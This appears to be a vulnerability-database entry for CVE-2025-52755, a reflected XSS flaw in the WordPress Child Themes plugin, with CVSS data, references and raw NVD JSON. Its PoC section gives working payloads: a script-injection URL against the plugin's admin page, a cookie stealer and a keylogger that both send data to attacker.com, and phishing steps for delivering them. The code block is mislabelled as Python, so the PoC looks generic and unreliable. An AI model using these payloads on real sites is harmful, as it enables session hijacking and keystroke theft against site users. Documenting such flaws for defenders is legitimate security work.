CVE-2025-52755

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Chris Taylor Child Themes child-themes allows Reflected XSS.This issue affects Child Themes: from n/a through <= 1.0.1.

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Child Themes (WordPress插件) <= 1.0.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-52755 PoC - Reflected XSS in WordPress Child Themes Plugin -->
<!-- Target: Child Themes WordPress Plugin <= 1.0.1 -->
<!-- Attack Vector: Inject malicious JavaScript via URL parameter -->

<!-- Malicious URL that triggers the XSS -->
<!-- 
http://target-site.com/wp-admin/admin.php?page=child-themes&search=<script>alert(document.cookie)</script>
-->

<!-- More sophisticated payload for cookie stealing -->
<script>
  // Steal session cookies
  var cookies = document.cookie;
  var img = new Image();
  img.src = "http://attacker.com/log?c=" + encodeURIComponent(cookies);
</script>

<!-- Keylogger payload -->
<script>
  document.onkeypress = function(e) {
    var keystroke = String.fromCharCode(e.which || e.keyCode);
    new Image().src = "http://attacker.com/log?k=" + keystroke;
  }
</script>

<!-- Exploitation steps:
1. Attacker crafts a malicious URL with XSS payload
2. Attacker tricks victim into clicking the link (phishing email, social engineering)
3. Victim's browser executes the injected JavaScript
4. Attacker steals session cookies or performs actions on behalf of victim
-->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-52755
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-52755
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-52755/
[4] VulDB https://vuldb.com/cve/CVE-2025-52755
[5] https://patchstack.com/database/Wordpress/Plugin/child-themes/vulnerability/wordpress-child-themes-plugin-1-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-52755", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:45.440", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Chris Taylor Child Themes child-themes allows Reflected XSS.This issue affects Child Themes: from n/a through <= 1.0.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/child-themes/vulnerability/wordpress-child-themes-plugin-1-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}